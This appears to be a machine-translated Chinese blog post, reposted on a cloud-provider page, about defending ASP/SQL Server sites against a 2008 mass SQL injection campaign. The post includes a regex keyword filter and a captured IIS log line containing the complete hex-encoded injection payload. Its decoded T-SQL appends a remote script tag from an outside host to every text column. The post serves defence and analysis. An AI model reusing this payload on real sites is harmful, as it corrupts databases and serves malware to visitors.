The latest popular database for horse-hanging solutions

Source: Internet
Author: User

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

some time ago, the company a major web site database of individual tables of data are often modified and hung horse, because the site was previously done by others, code a little messy, so only to see the relevant file code with these tables. The reason may be to receive the parameters of the time does not filter the dangerous characters, and then add the parameters to accept the Format function, the database connection file in the acceptance of the parameters appear ";" Replaced with ";" But after a day, the horse was hung, and the semicolon substitution did not work.





then searched, and found that from March onwards a lot of database Sql injection Hanging horse example, it seems this time this means of horse is popular, and only for Asp+sql server website, only your site code exists SQL injection loophole, you may be hanged horse, And only for text-type fields char/text similar fields, after the modified data are basically js,1.js,b.js, and the Web site often changed.





helpless, can only find the way to prevent SQL injection, online search to the following code, add the code to the database connection file:





<%


Response.Buffer = True


Const enablestopinjection = True


If enablestopinjection = True Then


If request.querystring <> "" Then call Stopinjection (request.querystring)


If request.cookies <> "" Then call Stopinjection (request.cookies)


If request.form <> "" Then call Stopinjection (Request.Form)


End If


Sub stopinjection (Values)


Dim regEx


Set regEx = New RegExp


regex.ignorecase = True


Regex.global = True


Regex.pattern = "' |;| #| ([\s\b+ ()]+ (select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add| set|open|close|use|begin|retun|as|go|exists) [\s\b+]*) "


Dim Sitem, svalue


for each sitem in Values


svalue = Values (sitem)


If regex.test (svalue) Then


Response.Write "SQL injection risk detected, please confirm the information you submitted." "


Response.End


End If


Next


Set regEx = Nothing


End Sub


%>


Note: The values in the Regex.pattern are set according to your needs, such as improper settings, then the general submitted information will also prompt for SQL injection.





added this code has never been injected into the phenomenon of horse.





a few days ago, from the space business to IIS log, to see the log was found by SQL injection of specific URLs and methods, as follows:





2008-06-23 16:01:31 get/xxx.asp Id=90;declare%20@s%20varchar (4000); Set%20@s=cast ( 0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7 220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e 73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e7874797 0653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f7220464554434820 4e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d30292042454 7494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e56455254285641524348415228 34303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f7777772e616477626e722e636f6d2f622e6a733e3c2f7 363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736 F7220%20as%20varchar (4000)); EXEC (@S);---201.8.166.17 mozilla/4.0+ (compatible;+msie+7.0;+windows+nt+5.1;+.net+clr+2.0.50727)-www.xxx.com 200 0 271 1432 406





in the middle of the code after the decryption is:





DECLARE @T varchar (255),


@c varchar (255)


DECLARE table_cursor Cursor for


Select


A.name,b.name


from sysobjects A,


syscolumns b


where A.id=b.id and


a.xtype= ' u ' and


(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)


OPEN table_cursor


FETCH NEXT from table_cursor into @t,@c


while (@ @FETCH_STATUS =0)


BEGIN


exec (' Update [' +@t+ '] set [' +@c+ ']=


RTrim (CONVERT (varchar,[' +@c+ ')) +


"Hang Horse content")


FETCH NEXT from table_cursor into @t,@c


End


Close Table_cursor


deallocate table_cursor





and, this SQL injection every few minutes, and constantly changing the IP, simply can not find its real source, it is obvious how despicable such people.





If the Web site IIS log is larger, you can consider the "IIS Web Log Import Analysis tool" written Chxwei a few days ago to help you query the analysis.





finally concludes that if the database database is modified and hangs the horse:





1, first look at the IIS log, what is the injected page, and then modify the code of those pages to prevent SQL injection.


2, if you don't have an IIS log and you can't find the pages you're using, use the above code in the database connection file.





appear SQL injection, there must be a loophole in the site code, so code normalization is the focus.





Source: http://www.chxwei.com/article.asp?id=359





Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.